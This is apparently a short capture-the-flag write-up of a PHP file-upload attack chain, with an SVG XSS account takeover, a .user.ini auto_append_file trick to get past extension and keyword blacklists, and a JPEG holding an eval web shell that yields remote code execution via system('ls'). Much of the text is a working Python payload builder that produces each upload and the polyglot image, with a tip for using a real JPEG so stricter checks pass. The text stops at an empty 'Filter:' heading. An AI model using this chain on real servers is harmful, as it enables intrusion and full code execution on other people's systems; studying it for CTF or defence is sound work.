Very quick little write-up:
First step: get hold of a friend account via XSS in an uploaded SVG.
With that account you can upload a small file (at most 20 characters) as long as it contains none of the blacklisted keywords (system, exec, `, …) and has none of the blacklisted extensions (php, .ht*, …). The response header X-Powered-By: PHP-fpm/5.6 was the tell: per-directory .user.ini files are only honoured by the CGI/FastCGI SAPIs (php-fpm, not mod_php), and .user.ini is neither a .php nor a .ht* file, so it sails past the extension blacklist. So we uploaded a .user.ini, a per-directory configuration INI file that is applied to every PHP script executed from that directory.
auto_append_file (a PHP_INI_PERDIR setting, so it may be set from .user.ini) makes PHP parse the given file after the main script. The 20-character budget applies to the .user.ini itself, so the appended file needs a very short name: `auto_append_file=xx` is 19 characters. We therefore upload a 20-character PHP file called xx. As 20 characters is too short for a real shell (is it? usort magic maybe?), the stub instead copies an image that carries PHP code to a shorter name, so that the image can be auto-appended in turn. This way we avoid both the character limit and the keyword blacklist, because the image goes through the normal image upload path rather than the filtered one. With the .user.ini in place, the xx file is appended to every PHP script run from that directory.
1.jpg is an image with <?=eval($_GET[1337]);?> embedded as a comment; PHP scans the whole file for `<?`, so the surrounding image bytes are simply echoed and the tag is executed.
Now we browse to upload/[md5]/index.php; that request triggers the appended xx stub, which copies 1.jpg to 1. Then we update the .user.ini to `auto_append_file=1` (18 characters). One caveat: php-fpm caches .user.ini for user_ini.cache_ttl seconds (300 by default), so the updated file may take up to five minutes to be picked up. After that we can execute code like this: upload/[md5]/index.php?1337=system('ls'); (the output follows the echoed image bytes).
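The three uploads above, written out as an added example (my own code, not part of the original write-up). It models the two constraints the post describes (20-character limit, keyword blacklist) on the .user.ini and stub uploads, and builds the 1.jpg payload by splicing a JPEG COM segment holding the PHP tag right after the SOI marker, which is one way to carry PHP code in an image while keeping it a valid JPEG for decoders. The stub contents are an assumption (the post names the file xx but its bytes are not reproduced), the blacklist is only the part the post lists, and the base JPEG is a constructed two-marker container, not a decodable picture.

```python
"""Payload builder for the .user.ini / auto_append_file chain (added example)."""
import struct

MAX_LEN = 20                           # upload size limit stated in the write-up
BLACKLIST = ("system", "exec", "`")    # keywords the write-up lists; the real list is longer
PHP_COMMENT = b"<?=eval($_GET[1337]);?>"   # the tag the write-up puts into 1.jpg


def check_upload(data: bytes) -> list[str]:
    """Return the constraints a candidate upload violates (empty list = passes).

    This models the limits described in the write-up; the site's real filter is
    not reproduced here.
    """
    problems = []
    if len(data) > MAX_LEN:
        problems.append(f"too long: {len(data)} > {MAX_LEN}")
    low = data.lower()
    for word in BLACKLIST:
        if word.encode() in low:
            problems.append(f"blacklisted keyword: {word}")
    return problems


def inject_jpeg_comment(jpeg: bytes, comment: bytes) -> bytes:
    """Insert a COM (0xFFFE) segment directly after the SOI marker of a JPEG.

    Decoders ignore COM segments, so the file stays a valid image, while PHP,
    which scans the whole file for '<?', executes the tag once the file is
    pulled in through auto_append_file.
    """
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    if len(comment) + 2 > 0xFFFF:
        raise ValueError("comment does not fit in one COM segment")
    segment = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return jpeg[:2] + segment + jpeg[2:]


def jpeg_comments(jpeg: bytes) -> list[bytes]:
    """Walk the header segments of a JPEG and return the payload of every COM."""
    out, pos = [], 2
    while pos + 2 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):      # EOI or SOS: no more header segments
            break
        if pos + 4 > len(jpeg):
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        if marker == 0xFE:
            out.append(jpeg[pos + 4:pos + 2 + length])
        pos += 2 + length
    return out


# Stage 1: .user.ini pointing at the stub (19 bytes, no blacklisted words).
USER_INI_STAGE1 = b"auto_append_file=xx"
# Stage 1 stub: copies the uploaded image to a name short enough for stage 2.
# Assumed content; with short_open_tag enabled it is exactly 20 bytes.
XX_STUB = b"<?copy('1.jpg','1');"
# Stage 2: point auto_append_file at the copied image (18 bytes).
USER_INI_STAGE2 = b"auto_append_file=1"
# Constructed base image: SOI + EOI only, enough for a magic-byte check, not decodable.
BASE_JPEG = b"\xff\xd8\xff\xd9"


def build_payloads(base_jpeg: bytes = BASE_JPEG) -> dict[str, bytes]:
    """Return the files uploaded in order, keyed by their upload name."""
    return {
        ".user.ini": USER_INI_STAGE1,
        "xx": XX_STUB,
        "1.jpg": inject_jpeg_comment(base_jpeg, PHP_COMMENT),
        ".user.ini#2": USER_INI_STAGE2,
    }


if __name__ == "__main__":
    for name, data in build_payloads().items():
        verdict = "ok" if not check_upload(data) else "; ".join(check_upload(data))
        print(f"{name:12} {len(data):3} bytes  {verdict}")
```

To use it against a real image, pass the bytes of an actual JPEG to build_payloads so that stricter checks (getimagesize needs a frame header) also pass; the COM segment is inserted before the existing segments and does not disturb them.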
Very interesting PHP-golf challenge; I had hoped to find a 20-character full shell so that this would work without the pictures. The shortest I could come up with was 24 characters. WORK IN PROGRESS!
Filter: